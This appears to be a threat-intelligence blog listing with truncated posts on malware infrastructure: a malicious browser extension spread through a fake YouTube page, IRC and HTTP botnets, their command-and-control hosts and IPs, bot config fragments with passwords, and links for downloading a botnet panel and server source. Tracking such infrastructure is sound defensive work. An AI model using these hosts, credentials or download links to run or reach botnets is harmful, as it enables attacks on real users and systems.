Feedbuzz.info (Malicious browser extension Hosted in Canada by Sarah Ryan)

Uncategorized

Resolved Feedbuzz.info to 184.107.233.186 The extension comes in both firefox and chrome flavors Initial loading comes from a fake youtube page, http://video8244.uni.me  The page is loaded from a dropbox account (/u/95827902/), and the extensions are loaded from epicrewards.net Here is the firefox extension source loadScript_you(); function loadScript_you() { if ('https:' == document.location.protocol) return false; varRead more...

brutinhoesilkster.servegame.com(Linux bots hosted in United States Dallas Limestone Networks Inc.)

Uncategorized

Resolved : [brutinhoesilkster.servegame.com] To [63.143.41.236] var $config = array(“server”=>”brutinhoesilkster.servegame.com”, “port”=>”443”, “pass”=>””, “prefix”=>”[BET][RLZ]”, “maxrand”=>”4”, “chan”=>”#betorlz”, “chan2″=>””, “key”=>””, “modes”=>”+iB-x”, “password”=>”betinho”, “trigger”=>”.”, “hostauth”=>”*” // Clients: I have 297 clients and 0 servers Local users: Current local users: 297 Max: 607 Global users: Current global users: 297 Max: 607 Now talking in #betorlz ([[BET][RLZ]2706) [UdpFlood Finalizado!]: 1687 MB enviadosRead more...

esta4.info(ngr botnet hosted in United States San Jose Serveryou.com – Oow)

Uncategorized

Resolved : [esta4.info] To [216.172.132.123] other domain names used from same guy: jer0002.in Resolved : [jer0002.in] To [216.172.132.123] jer0003.in Resolved : [jer0003.in] To [216.172.132.123] ratk01.com Resolved : [ratk01.com] To [216.172.132.123] Remote Host Port Number 199.15.234.7 80 216.172.132.123 1887 PASS powned NICK n{US|XPa}rqrrlpw USER rqrrlpw 0 0 :rqrrlpw JOIN #sbsb powned JOIN #XP JOIN #US NowRead more...

85.95.247.26(Wolk-Panel HTTP Bot hosted in Turkey Izmir Inetmar Internet Hizmetleri San. Tic. Ltd. Sti)

Uncategorized

Remote Host Port Number 85.95.247.26 80 Panel: http://85.95.247.26/~estacion/Panel/Web-Panel/priv8/ u can download web panel from here:http://85.95.247.26/~estacion/ if the file is removed go to http://www.secret-zone.net/f124/volk-http-botnet-%5B-%5Dpharming-%5Bver-4-0%5D-4212/ to download server source and web panel hosting infos: http://whois.domaintools.com/85.95.247.26